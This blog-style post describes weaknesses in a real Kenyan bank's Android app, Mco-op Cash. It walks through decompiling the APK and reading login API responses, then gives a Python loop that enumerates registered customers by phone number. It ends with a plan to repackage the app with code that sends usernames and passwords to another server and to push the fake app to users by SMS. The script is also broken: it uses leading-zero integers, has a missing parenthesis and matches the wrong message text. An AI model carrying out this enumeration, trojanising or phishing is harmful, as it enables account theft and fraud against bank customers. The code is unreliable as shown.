Exploiting Mco-op Cash Android App

Disclaimer.
1. I am not a hacker.
2. I have not actually tested my idea.
3. I have reported this to Co-op Bank.
4. This is not a tutorial. (I will skip a lot of stuff).

Vulnerabilities

1. Mco-op cash Application is a hybrid application. Meaning that it is built with HTML, CSS and JS then packaged as a mobile app. While building a hybrid app is faster and easier than building a native application , it does make it easy to reverse engineer.

2. The app uses phone numbers as usernames.

3. The API responses are not encrypted so its quite easy to figure out what is happening in the background.

Reverse engineering

Reverse engineering an android application is more straight forward than it sounds.

Step 1. Get The .apk file

Just copy the Playstore URL in our case https://play.google.com/store/apps/details?id=com.coopbank.cooperative

Go to http://apps.evozi.com/apk-downloader/ and paste it and generate download link.

Easy right.

Step 2. Get a Decompiler

Step 3. Decompile.

kwisha.

The Code

The first thing i looked for is the API endpoints ie the url where the app sends requests to for things like logins and registration.
I then tested the login endpoints with these parameters, and got these responses

  1. Correct username and password (mine)
{“success”:true,”custometno”:”152xxxx",”message”:”Login successful”,”logintime”:1425366269,”partialregistration”:false}

2. Correct username and wrong password.

{“success”:false,”message”:”Invalid Details, Attempt: 1"}

3. Random username and password.

{“success”:false,”message”:”Kindly register using the self registration menu”}

4. Coop bank member , Expired

{“success”:false,”firstlogin”:true,”message”:”PIN has expired, Kindly view Terms and Condition and request PIN reset.”,”termsandconditionslink”:”http:\/\/www.co-opbank.co.ke"}

Using this info

Based on these http responses .. you can easily tell which user has signed up for Mco-op cash.

You can then write a script that loops through phone numbers … 0700000000 -0799999999 and saves the existing Mco-op Cash phone numbers. eg

import requests;
import json;
for x in range(0700000000, 0799999999):
post_data = {‘username’: x, ‘password’: ‘0000'}
post_response = requests.post(url=’coopbank-api-path.com/login.php', data=post_data)
js= json.loads(post_response.text)
if (js[‘message’] == ‘Invalid Details’:
#code to save phone number to database

Now we have a list of phone numbers of Mco-op Cash users.
You can then add a scripts into the application that sends username and passwords info to another server.

Finally … Repackage the app and send an SMS to users with a download link to the “fake” app.